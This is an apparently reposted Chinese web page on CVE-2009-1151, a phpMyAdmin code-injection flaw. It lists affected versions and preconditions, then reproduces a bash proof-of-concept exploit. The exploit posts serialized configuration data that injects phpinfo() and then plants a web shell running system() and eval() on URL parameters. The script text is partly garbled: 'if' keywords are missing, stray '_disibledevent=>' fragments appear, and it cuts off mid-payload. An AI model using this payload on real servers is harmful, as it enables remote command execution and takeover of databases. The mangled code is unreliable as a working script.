phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 及 3.0.1.1版本;
Linux内核版本 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2);
攻击环境要求:
phpMyAdmin版本:早于2.11.9.52.11.x和早于3.1.3.13.x;
此漏洞只针对采用向导模式安装phpMyAdmin有效而对采用手动安装无效;
管理员必须未删除"/phpMyAdmin/"目录下"/config/"子目录"/scripts/up.php"尝试创建下面PHP代码注入"config.inc.php"文件正是在这个子目录下
代码
#!/bin/bash
# CVE-2009-1151: phpMyAdmin '/scripts/up.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!
# PoC script successfully tested _disibledevent=>http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/up.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)
# more info _disibledevent=>http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
[[ $# -ne 1 ]]
then
echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
exit
fi
! which curl >/dev/null
then
echo "sorry but you need curl for this script to work!"
echo "on Debian/Ubuntu: sudo apt-get curl"
exit
fi
function exploit {
postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extens
最新评论